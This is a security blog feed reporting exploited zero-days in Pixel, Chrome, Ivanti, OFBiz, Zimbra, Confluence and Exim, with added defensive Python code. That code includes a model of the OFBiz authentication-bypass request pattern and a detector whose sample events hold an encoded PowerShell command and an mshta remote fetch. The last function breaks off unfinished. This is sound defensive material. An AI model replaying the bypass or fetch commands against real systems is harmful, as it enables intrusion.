0-Day Archives – Gridinsoft Blog
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Feed generated: Fri, 31 May 2024 01:07:38 +0000

Two Android Zero-Day Flaws in Google Pixel Exploited
https://gridinsoft.com/blogs/android-zero-day-flaws-google-pixel/
Published: Fri, 05 Apr 2024 16:04:37 +0000

Google has disclosed that two Android zero-day security vulnerabilities have been detected in its Pixel smartphones. A patch is already available: Google reports having fixed the flaws in the recent Pixel Update Bulletin. Worse, the flaws are already being exploited in targeted attacks.

Two Android Zero-Day Flaws Exploited in Targeted Attacks

In a recent announcement, Google disclosed two zero-day security vulnerabilities in its Pixel smartphones. The first, CVE-2024-29745 (CVSS 7.2), is an information disclosure flaw in the bootloader component that compromises data confidentiality. The second, CVE-2024-29748, is a privilege escalation flaw in the firmware component that can allow unauthorized access to and control over the device.

[Image: detailed explanation of the new zero-days from GrapheneOS developers]

According to Google’s advisory, these vulnerabilities were fixed on April 2, 2024. They were originally discovered back in early January 2024 by GrapheneOS developers. The good news is that they are subject only to limited, targeted exploitation, so the risk of widespread exploitation is relatively low. Nonetheless, Google urges all Pixel smartphone users to update their devices to the latest software version as soon as possible.

Android Zero-Day Vulnerabilities Exploited in the Wild

Although Google has not provided specifics on the attacks, GrapheneOS developers have indicated active exploitation of these flaws. In addition, CISA has added both vulnerabilities to its Known Exploited Vulnerabilities Catalog. CVE-2024-29745 is a vulnerability in the fastboot firmware, which handles device states such as unlocking, flashing, and locking. Threat actors can exploit this flaw to access the device’s memory without privileges or user interaction.

CVE-2024-29748 presents a different risk. This flaw allows an attacker to interrupt a factory reset triggered by apps through the device admin API. As a result, attackers were able to stop the device from completing the factory reset, although this requires physical access to the device. Although Google has addressed part of the issue, GrapheneOS has pointed out that the reset can still be interrupted by cutting power to the device. GrapheneOS is therefore working on a more comprehensive solution, which includes a stronger duress PIN/password feature and a secure “panic wipe” action that can be executed without requiring a reboot.

Safety Recommendations

As the digital landscape evolves, so does the sophistication of cyber threats. To mitigate these risks, users should verify that their devices are running the latest software version. Staying informed about security updates and best practices is crucial to safeguarding digital assets against emerging threats. Google’s disclosure is a reminder of the ongoing battle for cybersecurity and of the need for continuous improvement in the defenses that protect personal information.

New Google Chrome 0-day Vulnerability Exploited, Update Now
https://gridinsoft.com/blogs/new-google-chrome-0-day-vulnerability/
Published: Tue, 16 Jan 2024 20:34:57 +0000

In its most recent release notes, Google reports a new 0-day vulnerability that is already being exploited in the wild. The update fixes the issue, but the very fact that it is being exploited means it should be installed as soon as possible. It appears to be the first 0-day exploit in the Chrome browser in 2024.

New Chrome 0-day Vulnerability Fixed

On January 16, Google released an update for its Chrome browser that fixes three vulnerabilities. One of them, CVE-2024-0519, was reported by an anonymous reporter, and the company acknowledges that this flaw is being exploited in the wild.

[Image: an excerpt from Google’s patch note for the latest Chrome update]

The key issue lies in improper memory access control in the V8 JavaScript engine used in Chrome; it falls under the CWE-119 designation (improper restriction of operations within the bounds of a memory buffer). V8 relies on direct memory addressing, and without proper bounds handling it can end up referencing a memory location outside the intended buffer. This gives attackers the ability to both read from and write to memory they should not be able to reach, which can cause data leaks and arbitrary code execution.

Besides the most serious issue, two high-severity vulnerabilities are fixed in the same update. Both also affect the V8 JavaScript engine: one concerns insufficient validation of memory writes, the other type confusion. The latter can lead to effects similar to CVE-2024-0519, so it should be treated with the same seriousness. The good news about these two is that there is no evidence of real-world exploitation.

Google Releases Fix to the Newest 0-day Exploit

The severity of the issue obviously calls for an urgent response from the developer. Fortunately, Google never hesitates to patch such bugs. However, because of rollout limitations, the patch may not be available to all users simultaneously. Here is the list of OS-specific versions that contain the fix.

OS        Version with Fix
Windows   120.0.6099.224(225)
MacOS     120.0.6099.234
Linux     120.0.6099.224

To check whether your browser is up to date, or to trigger an update check, go to Settings → About Chrome. This page checks for available updates each time it is opened.

[Image: Chrome updated]

Being the most popular web browser is not only a privilege, as you may witness. Such a huge user base means increased (if not maximal) attention from adversaries, who treat such vulnerabilities as nothing short of a gift. For ordinary users, the best countermeasure is to keep an eye on the latest updates, specifically on what issues they fix.

Ivanti Connect Secure Zero-Day Vulnerability Exploited In The Wild
https://gridinsoft.com/blogs/ivanti-connect-secure-0day-exploited/
Published: Fri, 12 Jan 2024 10:15:08 +0000

Ivanti has issued an alert about its Connect Secure VPN appliances. Advanced threat actors, possibly including state-sponsored groups, are exploiting two zero-day vulnerabilities in cyberattacks. This is yet another vulnerability in Ivanti software.

Ivanti Connect Secure Zero-Day Exploited

Ivanti, a prominent software company, recently issued a critical alert concerning its Connect Secure VPN appliances. These devices are susceptible to zero-day vulnerabilities currently being exploited in sophisticated cyberattacks, which experts attribute to suspected Chinese state-backed hackers.

Ivanti has confirmed that the vulnerabilities allow attackers to gain unauthorized access and execute arbitrary code on affected devices. Given the widespread use of Ivanti Connect Secure appliances to provide secure remote access to corporate networks in various business environments, this is of heightened concern.

Details of the ICS 0-Day Vulnerability

The exploited vulnerabilities are CVE-2023-46805 (CVSS 8.2) and CVE-2024-21887 (CVSS 9.1). They can be chained into an exploit that takes over susceptible instances over the Internet, with severe consequences including remote code execution (RCE) and unauthorized access to sensitive data. That also explains the 8+ scores: the two flaws are most dangerous in combination.

The first vulnerability is an authentication bypass in the web component, which allows remote attackers to access restricted resources without proper control checks. The second is a command injection in the web components, which allows authenticated administrators to execute arbitrary commands on the appliance by sending specially crafted requests. Chained together, the bypass supplies the authentication that the command injection otherwise requires.

Patches Not Yet Available

Although it has identified fewer than ten affected customers, Ivanti has advised all of its customers to run the external Integrity Checker Tool (ICT) as a precaution. The company has also added new functionality to the external ICT, which will be incorporated into the internal ICT. Customers should ensure they have the latest versions of both tools.

As for patches, Ivanti plans to release them during the week of January 22, rolled out on a staggered schedule according to product version. In the meantime, the company has published a series of mitigation steps that customers should apply immediately to safeguard their systems. Organizations are strongly recommended to follow these steps, as the situation is still evolving.

How to Protect against 0-day vulnerabilities?

Since a zero-day vulnerability is one that attackers learned about before the software developers did, there is no guaranteed solution. However, some measures significantly reduce the risk, and I list them below:

  • Use corporate-grade protection solutions like EDR/XDR. This approach to anti-malware protection focuses on the organization’s endpoints as a whole rather than on individual devices in isolation. EDR and XDR solutions collect a vast amount of data about endpoint activity, including file operations, network traffic, and user behavior, and employ machine learning and AI to detect and respond to threats. By analyzing this data, they can identify anomalous patterns that indicate a zero-day attack.
  • Apply Zero Trust. Zero trust is a cybersecurity model that grants access on a least-privilege basis and continuously verifies users and devices. This reduces the attack surface and makes vulnerabilities harder to exploit.
  • Perform regular pentesting. Penetration testing is a simulated attack on an organization’s IT infrastructure to identify and assess vulnerabilities that real attackers could exploit. It can help organizations find weaknesses, including zero-day vulnerabilities, that other security tools may not detect.

Apache OFBiz Vulnerability Exposes Millions of Systems
https://gridinsoft.com/blogs/apache-ofbiz-vulnerability/
Published: Tue, 09 Jan 2024 22:09:50 +0000

The cyber world has been rattled by the recent discovery of a critical zero-day vulnerability in Apache OFBiz, tracked as CVE-2023-51467. Researchers at SonicWall disclosed the flaw, which enables attackers to bypass authentication and carry out Server-Side Request Forgery (SSRF). The vulnerability is severe, with a CVSS score of 9.8, and has raised concerns across the many industries that rely on Apache OFBiz’s Java-based web framework.

What is Apache OFBiz?

Apache OFBiz is an integral part of the digital backbone of numerous industries, from financial services to healthcare. This open-source Enterprise Resource Planning (ERP) system manages complex business processes and is essential to many large enterprises. That is what makes CVE-2023-51467 more than a technical glitch: wide exploitation could become a gateway to catastrophic disruption of critical services and infrastructure.

Apache OFBiz Vulnerability – Technical side

SonicWall’s research team detected this critical zero-day vulnerability and promptly disclosed it to Apache OFBiz’s maintainers. The root of the vulnerability lies in the application’s login functionality, specifically the checkLogin function. By setting the “requirePasswordChange” parameter to “Y” in the URI and supplying null or invalid credentials, an attacker causes the function to return a success status, which grants unauthorized access.

[Image: code parts of the login function in LoginWorker.java]

How does the exploit work?

  1. Manipulating the CheckLogin Function
    The core issue lies in the “checkLogin” function. Normally, this function should validate a user’s credentials before granting access. However, due to a flaw in its implementation, it fails to perform this task correctly under certain conditions.
  2. Exploiting Null or Invalid Credentials
    The exploit involves sending a crafted HTTP request where the “USERNAME” and “PASSWORD” parameters are left empty, or invalid values are provided. However, the exploit includes the “requirePasswordChange=Y” parameter in the URI.
  3. Bypassing Authentication Checks
    Due to the flawed logic in the “checkLogin” function, when it receives null or invalid credentials along with the “requirePasswordChange=Y” parameter, it incorrectly bypasses the usual authentication checks. Specifically, it fails to enter the conditional block that checks whether the username and password are null. Consequently, it erroneously returns a success status, allowing the authentication process to be bypassed.
  4. Potential for Server-Side Request Forgery (SSRF) or Remote Code Execution (RCE)
    By bypassing authentication, an attacker could potentially perform SSRF or RCE, leading to unauthorized access to sensitive data or control over the system.
[Image: sending an HTTP request to which the server responds with a “PONG” message]
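The four steps above, as an added Python model written for this page (it is not Apache OFBiz code; the real function lives in LoginWorker.java). The status strings, the credential store and the request dictionaries are assumptions constructed to mirror the description: an inner login step that returns a third, non-error status when requirePasswordChange=Y is present, a pre-fix checkLogin that treats only an explicit "error" as failure, and a fail-closed version beside it.

```python
"""Simplified model of the CVE-2023-51467 logic flaw described in the article.

Not Apache OFBiz code: names, status strings and the credential store are
assumptions chosen to mirror the article's description of checkLogin.
"""

SUCCESS = "success"
ERROR = "error"
PASSWORD_CHANGE = "requirePasswordChange"  # assumed name for the third status

# Constructed credential store standing in for the real user database.
CREDENTIALS = {"demo-user": "demo-pass"}


def login(params: dict) -> str:
    """Inner login step: returns one of three status strings, not a boolean."""
    username = params.get("USERNAME") or None   # "" is treated as missing
    password = params.get("PASSWORD") or None
    if params.get("requirePasswordChange") == "Y":
        # The password-change flow is entered before the null-credential
        # check, so empty credentials never reach the block that rejects them.
        return PASSWORD_CHANGE
    if username is None or password is None:
        return ERROR
    return SUCCESS if CREDENTIALS.get(username) == password else ERROR


def check_login_vulnerable(params: dict) -> str:
    """Pre-fix logic: only an explicit "error" counts as a failed login.

    Any other status, including the password-change one reached with empty
    credentials, falls through and is reported as success.
    """
    if login(params) == ERROR:
        return ERROR
    return SUCCESS


def check_login_fixed(params: dict) -> str:
    """Hardened logic: anything other than an explicit "success" is a failure.

    A fail-closed comparison means a third status can no longer be mistaken
    for a successful authentication.
    """
    if login(params) != SUCCESS:
        return ERROR
    return SUCCESS


def looks_like_bypass_attempt(params: dict) -> bool:
    """Access-log heuristic: requirePasswordChange=Y combined with a missing or
    empty USERNAME or PASSWORD is the request pattern the article describes."""
    return (params.get("requirePasswordChange") == "Y"
            and (not params.get("USERNAME") or not params.get("PASSWORD")))


# Constructed requests (query parameters already parsed into dicts).
LEGIT = {"USERNAME": "demo-user", "PASSWORD": "demo-pass"}
WRONG_PASSWORD = {"USERNAME": "demo-user", "PASSWORD": "nope"}
BYPASS_ATTEMPT = {"USERNAME": "", "PASSWORD": "", "requirePasswordChange": "Y"}


if __name__ == "__main__":
    for name, req in [("legit", LEGIT), ("wrong password", WRONG_PASSWORD),
                      ("bypass attempt", BYPASS_ATTEMPT)]:
        print(f"{name:15} vulnerable={check_login_vulnerable(req):8} "
              f"fixed={check_login_fixed(req):8} "
              f"flagged={looks_like_bypass_attempt(req)}")
```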

Exploitation of this flaw could have dire consequences: attackers could gain control over sensitive systems, compromise confidential data, and disrupt essential services. The widespread use of Apache OFBiz across sectors also heightens the risk of large-scale, coordinated attacks targeting multiple facets of society simultaneously.

Patch and Recommendations

In response to this alarming discovery, Apache released a security update. The new version, 18.12.11, addresses the vulnerability, and immediate installation is strongly recommended. Organizations are also advised to conduct thorough security audits and apply patches to all affected platforms promptly.

Users of Apache OFBiz are strongly advised to:

  • Upgrade to Apache OFBiz version 18.12.11, which contains the fix for this vulnerability.
  • Regularly audit systems for vulnerabilities and apply necessary patches.
  • Keep an eye on system logs and access patterns to detect any signs of exploitation attempts.
  • Utilize XDR solutions proactively to prevent cyberattacks by continuously monitoring and correlating data across endpoints, networks, and cloud environments. Early threat detection and rapid response are key.

Zimbra Vulnerability Exploited in the Wild
https://gridinsoft.com/blogs/zimbra-0-day-vulnerability/
Published: Mon, 20 Nov 2023 13:03:39 +0000

Google TAG’s recent discovery reveals a 0-day exploit, CVE-2023-37580, targeting Zimbra Collaboration. This is a Cross-Site Scripting (XSS) vulnerability exploited in four campaigns.

Zero-day discovery was patched

A severe vulnerability has been discovered in the Zimbra email software. Four hacker groups exploited it to steal email data, user credentials, and tokens. According to Google TAG’s research, most attacks were observed after the company published an initial patch on GitHub.

The vulnerability, CVE-2023-37580, with a CVSS score of 6.1, is a cross-site scripting (XSS) flaw present in versions before 8.8.15 Patch 41. The company addressed it in the updates released on July 25, 2023. The flaw can be exploited to run malicious scripts in a victim’s web browser after the victim simply clicks a crafted URL. The worst part is that nothing needs to be downloaded or installed for the attack to succeed.

Exploitation Overview

In June 2023, researchers observed multiple waves of cyberattacks. The attacks began on June 29, at least two weeks before Zimbra released its official notice. Three of the four malicious campaigns were discovered before the patch was issued, while the fourth was detected a month after the patch was published.

[Image: Zimbra vulnerability exploitation (image by Google TAG)]

Greece Targeted for Email Theft. The initial exploitation targeted a government organization in Greece, using emails containing exploit URLs. Clicking the link during an active Zimbra session deployed a framework documented by Volexity in February 2022. The framework used XSS to steal mail data, including emails and attachments, and set up auto-forwarding to an attacker-controlled email address.

Winter Vivern Exploits after Hotfix. Following the hotfix on July 5, an actor exploited the vulnerability for two weeks starting July 11. Multiple exploit URLs targeted government organizations in Moldova and Tunisia; the activity is attributed to the APT group Winter Vivern (UNC4907). The vulnerability was used to load malicious scripts.

Phishing Campaign in Vietnam. Days before Zimbra’s official patch, an unidentified group exploited the vulnerability in a campaign phishing for credentials at a Vietnamese government organization. The exploit URL pointed to a script that displayed a phishing page for webmail credentials.

Authentication Token Theft in Pakistan. After the CVE-2023-37580 patch release, a fourth campaign targeted a government organization in Pakistan, focusing on stealing Zimbra authentication tokens, which were exfiltrated to ntcpk[.]org.

Safety Recommendations

As we can see, attackers closely watch open-source repositories, continuously looking for vulnerabilities they can exploit. In some cases, the fix for a vulnerability is already visible in the repository but has not yet been released to users, which gives attackers a window to exploit it.

CVE-2023-37580 could allow an attacker to steal user data or take control of user accounts. Upgrade to Zimbra Collaboration (ZCS) 8.8.15 Patch 41 or later to avoid this vulnerability. If you cannot upgrade immediately, you can mitigate the risk of this vulnerability by disabling the Zimbra Classic Web Client and using the Zimbra Web App instead.

New Confluence Vulnerability Leads to Unauthorised Access
https://gridinsoft.com/blogs/new-confluence-vulnerability-unauthorised-access/
Published: Tue, 31 Oct 2023 15:32:49 +0000

Another vulnerability in Confluence, the flagship product of Atlassian, allows hackers to access servers and dump data. According to the company, the issue is improper authorization within the Data Center and Server apps. Patches for this flaw are already available.

Confluence Data Center and Server Vulnerability Leads to Data Loss

As often happens with authorization and input-validation vulnerabilities, the new Confluence flaw received a rather high CVSS score: 9.1/10. All versions of Confluence Data Center and Server are affected. The good news for clients is that the flaw was discovered by the developers and is not known to be exploited in the wild. At least not yet.

[Image: Atlassian’s publication on CVE-2023-22518]

Currently, neither the company nor researchers have published any PoC exploits for this flaw. In this short window, before attackers find a way to use the vulnerability, it is a very good idea to install the patches offered by the company. Although the vulnerability affects all Data Center and Server versions ever released, the patches cover only the most widely used versions.

CVE-2023-22518 is not the only recent security vulnerability in Confluence. A few weeks ago, on October 5, the cybersecurity world was set abuzz by a zero-day discovery in the same Data Center and Server solution. That exploit was reportedly used later by the Storm-0062 (a.k.a. DarkShadow) cybercrime gang. It allowed hackers to access Confluence servers and create accounts with admin privileges without any permissions required. For a smaller company or a more niche product this might not be so critical, but it is pretty bad for massively popular software such as Atlassian’s.

[Image: statistics regarding the cases of CVE-2023-22515 exploitation]

Confluence Patches for CVE-2023-22518 are Available

The fact that the company itself was the first to describe the flaw is the silver lining of the story. Along with the report about the discovered issue, it immediately released security updates that patch the vulnerability. And while the previous exploit worked only on Data Center and Server version 8 and later, the new flaw makes all versions susceptible to exploitation.

As several major versions of the solution are in use, the company has released patches for each of them:

Product: Confluence Data Center and Server
Fixed versions:
  • 7.19.16 or later
  • 8.3.4 or later
  • 8.4.4 or later
  • 8.5.3 or later
  • 8.6.1 or later
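
An added example, not from the article, Google or Atlassian: a small Python check that compares an installed version against the fixed releases listed in this table and in the Chrome table earlier in this feed. The fixed versions are the ones quoted in the articles; the host inventory is constructed sample data. Confluence fixes are back-ported per branch (8.6.0 is vulnerable although it is newer than 8.5.3), while Chrome has a single fix line, so the comparison takes a branch depth.

```python
"""Check installed versions against the fixed releases quoted in the articles.

Illustrative code written for this page, not a vendor tool. Fixed versions
are from the articles; the inventory below is constructed sample data.
"""

# Chrome fixed builds per OS. Windows lists two builds, 224 and 225; the
# lower one is the first patched build, so "(225)" is dropped when parsing.
CHROME_FIXED = {
    "windows": "120.0.6099.224(225)",
    "macos": "120.0.6099.234",
    "linux": "120.0.6099.224",
}

# Confluence Data Center and Server: one fixed release per supported branch
# (CVE-2023-22518). Branches absent from this list received no patch.
CONFLUENCE_FIXED = ["7.19.16", "8.3.4", "8.4.4", "8.5.3", "8.6.1"]


def parse_version(text: str) -> tuple:
    """Turn "120.0.6099.224(225)" into (120, 0, 6099, 224) for tuple comparison."""
    core = text.split("(", 1)[0].strip()
    return tuple(int(part) for part in core.split("."))


def patch_status(installed: str, fixed_versions, branch_depth: int):
    """Classify an installed version against a list of fixed versions.

    branch_depth=0: a single linear fix line (Chrome); anything at or above
    the fixed build is patched, including later majors.
    branch_depth=2: fixes back-ported per major.minor branch (Confluence);
    a version is compared only with the fix for its own branch.
    Returns (status, matching_fixed_version_or_None).
    """
    inst = parse_version(installed)
    for fixed in fixed_versions:
        fv = parse_version(fixed)
        if fv[:branch_depth] == inst[:branch_depth]:
            return ("patched" if inst >= fv else "vulnerable"), fixed
    # No fix exists for this branch: treat as needing an upgrade to a
    # branch that has one.
    return "no-fix-for-branch", None


def chrome_status(os_name: str, installed: str):
    return patch_status(installed, [CHROME_FIXED[os_name.lower()]], branch_depth=0)


def confluence_status(installed: str):
    return patch_status(installed, CONFLUENCE_FIXED, branch_depth=2)


# Constructed inventory: (host, product, os_or_None, installed_version)
SAMPLE_INVENTORY = [
    ("ws-01.example.test", "chrome", "windows", "120.0.6099.199"),
    ("ws-02.example.test", "chrome", "windows", "120.0.6099.225"),
    ("mac-07.example.test", "chrome", "macos", "121.0.6167.85"),
    ("wiki-a.example.test", "confluence", None, "8.6.0"),
    ("wiki-b.example.test", "confluence", None, "8.5.4"),
    ("wiki-c.example.test", "confluence", None, "8.2.3"),
]


def audit(inventory=SAMPLE_INVENTORY) -> dict:
    """Return {host: status} so the result can be fed to a ticketing system."""
    report = {}
    for host, product, os_name, installed in inventory:
        if product == "chrome":
            status, _ = chrome_status(os_name, installed)
        else:
            status, _ = confluence_status(installed)
        report[host] = status
    return report


if __name__ == "__main__":
    for host, status in audit().items():
        print(f"{host:22} {status}")
```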

As a mitigation, Atlassian only offers taking the vulnerable instance offline. Yes, this effectively means stopping any operations that rely on Confluence, but if the latest updates cannot be installed, not many other options are available.

How to protect against software vulnerabilities?

Well, as you can see, pretty much any software solution can have vulnerabilities. Brand, developer and the like make no difference: if there is something to hack, it will be hacked. Only a fast reaction and the presence of proper security can secure your system.

EDR/XDR systems that apply a zero-trust policy are the best way to secure yourself against exploitation attacks. Their all-encompassing protection allows them to track, analyze and stop any suspicious activity. Meanwhile, zero trust does not give an exploited application a free pass just because it is highly trusted: every app is treated as potentially dangerous, so even Confluence is checked as rigorously as a Java applet from the Web.

Keep an eye on recent cybersecurity news. Events like new vulnerabilities, or companies hacked through them, obviously cause massive discussion. Sure, not all of them will concern the software you use, but staying alert is worth it.

Regularly update the software or apply mitigation patches. Most minor updates are needed not only to fix minor bugs, but also to patch security vulnerabilities. A good habit here is reading the patch notes: they quickly reveal whether an update is security-related or brings other changes. For large companies with dozens of computers in the network, it may be complicated to update all software in one go, so prioritizing is important.

Exim Vulnerability Allows RCE, No Patches Available
https://gridinsoft.com/blogs/exim-vulnerability-rce/
Published: Fri, 29 Sep 2023 20:54:06 +0000

Exim Internet Mailer, a program massively used as the basis for mail servers, appears to have a remote code execution vulnerability. By overflowing a buffer, hackers can make the program execute whatever code they need. Despite several reports to the developer, a patch is still not available.

What is Exim?

Exim is a mail transfer agent (MTA) for *NIX systems. First released in 1995, it gained popularity as a free, open-source and flexible mail solution. Over time it was ported to other platforms, including even Windows, and some Linux distributions included it as their default MTA. Despite its obsolescence, Exim still holds a share of roughly 59% among mail servers reachable on the Internet.

[Image: main site of Exim Internet Mailer]

Exim Buffer Overflow Vulnerability Allows RCE

Such popularity, along with long-missing updates, could not escape cybercriminals’ attention. A 0-day vulnerability, discovered by an anonymous reporter, lies in insufficient validation of user-supplied input. Attackers can reach the mail server on the default SMTP port 25 and write data past the end of a buffer. This eventually allows them to execute any command they wish, and at the scale of a mail server this may have horrific consequences.

It is common for RCE vulnerabilities to receive the highest CVSS ratings. CVE-2023-42115 received a rating of 9.8/10, which puts it in line with the infamous MOVEit and Citrix NetScaler vulnerabilities uncovered earlier this year. The problem has been known to the developers for almost half a year, and the patch is still unreleased.

How to protect against RCE Vulnerabilities?

Here, I usually share information about available patches from the vendor or temporary workarounds that fix the flaw. Not this time, though. The lack of response from the developer means any fix is left to Exim users themselves. The only way to be fully secure against the flaw is to avoid using the program, but that is rather problematic given the huge share of mail servers running Exim.

With that said, I still advise using top-notch security solutions that feature the most modern cybersecurity approaches. They will effectively detect and repel cyberattack attempts before hackers can achieve even a shade of success.

Giving crooks fewer chances of success, though, is not only about having a reliable security system. Sentinels are useless when there is an open vent in the warehouse. By open vent, I mean unpatched software with known vulnerabilities and low cybersecurity awareness among personnel. Cybercriminals know and love both of these common weak spots, and be sure: they won’t hesitate to use them when needed.

Can Zero-Day Attacks Be Prevented With Patches?
https://gridinsoft.com/blogs/zero-day-patching-effective-or-not/
Published: Thu, 07 Sep 2023 15:05:31 +0000

The post Can Zero-Day Attacks Be Prevented With Patches? appeared first on Gridinsoft Blog.

In recent years, zero-day exploits and attacks have become prominent emerging threats. These attacks take advantage of unknown vulnerabilities within software, which makes them almost impossible to detect and prevent. Zero-day attacks can have dire consequences, allowing attackers to take control of systems, steal data, or install malware.

What is a Zero-Day attack?

A zero-day vulnerability is a flaw the software vendor does not yet know about, so no patch exists for it; a zero-day attack is one that exploits such a flaw, often to deploy malware. Any application is a potential entry point, which makes it impossible to build a trustworthy list of "known safe" software and poses a serious challenge for cybersecurity analysts. For those who work in this industry, though, that challenge is part of the appeal.

Zero-day vulnerability
Zero-day vulnerability lifecycle

Attackers use such an unknown flaw in a program or operating system to run code of their choosing. The exploits cybercriminals value most are those that give remote code execution or privilege escalation, since these let them do whatever they want inside the compromised environment. Because a working zero-day exploit is expensive to develop or buy, it is usually reserved for targeted attacks on corporations and other organizations that hold valuable data.

Since at first only the criminal who found the flaw knows about it, there is no signature to match, and exploiting it without triggering alarms is comparatively easy. Even some EDR solutions can be fooled, letting actions by trusted programs through without considering that those actions may be malicious. That is why an endpoint protection product that judges behaviour, not just the reputation of the process, is advisable against zero-day attacks.

Identifying and Addressing Zero-Day Exploits and Attacks

Detecting and mitigating zero-day exploits and attacks is challenging because there is no known vulnerability or signature to look for. Nevertheless, there are strategies that help identify and contain these attacks.

  • Monitor network traffic and system logs for suspicious activity that could indicate a zero-day attack, such as a trusted process behaving in a way it never legitimately does.
  • Educate users on common attack methods, such as phishing and social engineering, to reduce the likelihood that a zero-day exploit ever reaches them.
  • Keep software and systems patched to minimize the known vulnerabilities an attacker could chain with a zero-day; a patch cannot fix an unknown flaw, but it shrinks the attack surface around it.
  • Implement intrusion detection and prevention systems to help detect and block exploitation attempts before they cause damage.
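One way to put the first bullet into practice, as an added example that is not part of the original post: a small behavioural detector over process-creation events. It flags the pattern described above, a trusted program (an Office application) doing something it never legitimately does, such as spawning a shell, running an encoded PowerShell command, or pulling a script over HTTP. The event format, the field names, the parent/child pairs treated as suspicious and the sample events themselves are all assumptions constructed for this illustration; you would feed in your own telemetry and tune the rules.

```python
"""Behavioural detection over process-creation events.

Added example for illustration, not Gridinsoft code. Events use a simplified
key=value format modelled loosely on Sysmon/EDR process-creation telemetry;
the field names, rule lists and sample events are assumptions.
"""
import re
from typing import Dict, List

# Constructed sample events (not real telemetry). The second and fourth lines
# show the pattern the post describes: a trusted program doing something it
# never legitimately does.
SAMPLE_EVENTS = """\
ts=2023-09-07T10:01:02Z host=ws01 parent=explorer.exe image=winword.exe user=alice cmdline="WINWORD.EXE /n report.docx"
ts=2023-09-07T10:01:09Z host=ws01 parent=winword.exe image=cmd.exe user=alice cmdline="cmd.exe /c powershell -enc SQBFAFgAIAAo..."
ts=2023-09-07T10:02:15Z host=ws02 parent=services.exe image=svchost.exe user=SYSTEM cmdline="svchost.exe -k netsvcs"
ts=2023-09-07T10:03:40Z host=ws03 parent=outlook.exe image=mshta.exe user=bob cmdline="mshta.exe http://198.51.100.7/update.hta"
ts=2023-09-07T10:04:01Z host=ws01 parent=cmd.exe image=ping.exe user=alice cmdline="ping -n 1 localhost"
"""

# Rule inputs (assumed lists; extend them for your own environment).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                  "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
REMOTE_SCRIPT_HOSTS = {"mshta.exe", "rundll32.exe", "regsvr32.exe"}

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
ENCODED_PS_RE = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\b")
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value line into a dict; quoted values keep their spaces."""
    event: Dict[str, str] = {}
    for key, raw in FIELD_RE.findall(line):
        event[key] = raw[1:-1] if raw.startswith('"') else raw
    return event


def detect(lines: List[str]) -> List[Dict[str, str]]:
    """Apply the behavioural rules to each event; one alert per rule that fires."""
    alerts: List[Dict[str, str]] = []
    for line in lines:
        ev = parse_event(line)
        if not ev:
            continue
        parent = ev.get("parent", "").lower()
        image = ev.get("image", "").lower()
        cmd = ev.get("cmdline", "").lower()
        fired: List[str] = []
        # Rule 1: an Office application spawning a shell or script host.
        if parent in OFFICE_PARENTS and image in SHELL_CHILDREN:
            fired.append("office_spawns_shell")
        # Rule 2: PowerShell started with an encoded command line.
        if "powershell" in cmd and ENCODED_PS_RE.search(cmd):
            fired.append("encoded_powershell")
        # Rule 3: a living-off-the-land script host fetching content over HTTP.
        if image in REMOTE_SCRIPT_HOSTS and URL_RE.search(cmd):
            fired.append("script_host_remote_url")
        for rule in fired:
            alerts.append({"rule": rule, "ts": ev.get("ts", ""),
                           "host": ev.get("host", ""), "user": ev.get("user", ""),
                           "process": f"{parent} -> {image}"})
    return alerts


def run_sample() -> List[Dict[str, str]]:
    """Run the rules over the constructed sample events."""
    return detect(SAMPLE_EVENTS.splitlines())


if __name__ == "__main__":
    for a in run_sample():
        print(f'{a["ts"]} {a["host"]} {a["rule"]}: {a["process"]} ({a["user"]})')
```

None of these rules needs a signature for the exploit itself: they key on the relationship between processes and on command-line shape, which is exactly what survives when the vulnerability is unknown. Expect some tuning, since a macro-heavy finance team will trip rule 1 legitimately and belongs on an exception list rather than in the rule.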

Patches May Be Ineffective, Here Is Why

Organizations have struggled with patch management for a long time. One reason is the sheer number of patches to handle: more than 20,000 new CVEs were published in 2021 alone, making it increasingly hard to keep up with all the updates.

Zero-Day vulnerability
Timeline of a zero-day vulnerability

Even if staying current with patches were easy, many users ignore them, assuming they can afford to update a few days or weeks after release. That practice carries real risk, which many users do not appreciate: once a patch is public, attackers can diff it against the previous version to find the flaw it fixes, so an unpatched system grows more exposed with every day. Patch management also gets little attention in security awareness training, despite the Department of Homeland Security's CISA requiring federal agencies to remediate critical vulnerabilities within 15 days.

Deciding which patches are critical is itself a dilemma for many security teams. Most have procedures to test patches internally before deployment, because a patch can occasionally be buggy or ineffective and cause more harm than good. IT teams also track deployments to make sure no device or system is left unpatched.
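To make the "which patches are critical, and by when" decision concrete, here is an added triage example that is not the post's own tooling. It classifies findings by priority, computes a remediation deadline per priority, and lists overdue items first. The severity thresholds and SLA windows are assumptions (the 15-day window for critical items mirrors the DHS figure cited above; the 30- and 90-day windows are illustrative), and the inventory, including the CVSS values and the placeholder LAB-* identifiers, is constructed for the example.

```python
"""Patch triage: decide which findings are critical and when they are due.

Added example, not the post's tooling. Severity thresholds and SLA windows are
assumed policy; the 15-day critical window mirrors the DHS figure the post
cites. The inventory below is constructed, including its CVSS values.
"""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Dict, List, Optional

SLA_DAYS = {"critical": 15, "high": 30, "medium": 90}   # assumed policy
PRIORITY_RANK = {"critical": 0, "high": 1, "medium": 2}


@dataclass
class Finding:
    host: str
    advisory: str          # CVE or vendor advisory identifier
    cvss: float
    detected: date         # when the scanner first reported it
    exploited_in_wild: bool = False
    internet_exposed: bool = False
    patched: Optional[date] = None


def classify(f: Finding) -> str:
    """Known exploitation or exposure raises priority; CVSS alone is only a floor."""
    if f.exploited_in_wild or f.cvss >= 9.0 or (f.internet_exposed and f.cvss >= 7.0):
        return "critical"
    if f.cvss >= 7.0:
        return "high"
    return "medium"


def due_date(f: Finding) -> date:
    """Deadline counted from detection, as the DHS directive does, not from release."""
    return f.detected + timedelta(days=SLA_DAYS[classify(f)])


def is_overdue(f: Finding, today: date) -> bool:
    """Unpatched past the deadline, or patched later than the deadline allowed."""
    deadline = due_date(f)
    return today > deadline if f.patched is None else f.patched > deadline


def triage(findings: List[Finding], today: date) -> List[Dict[str, object]]:
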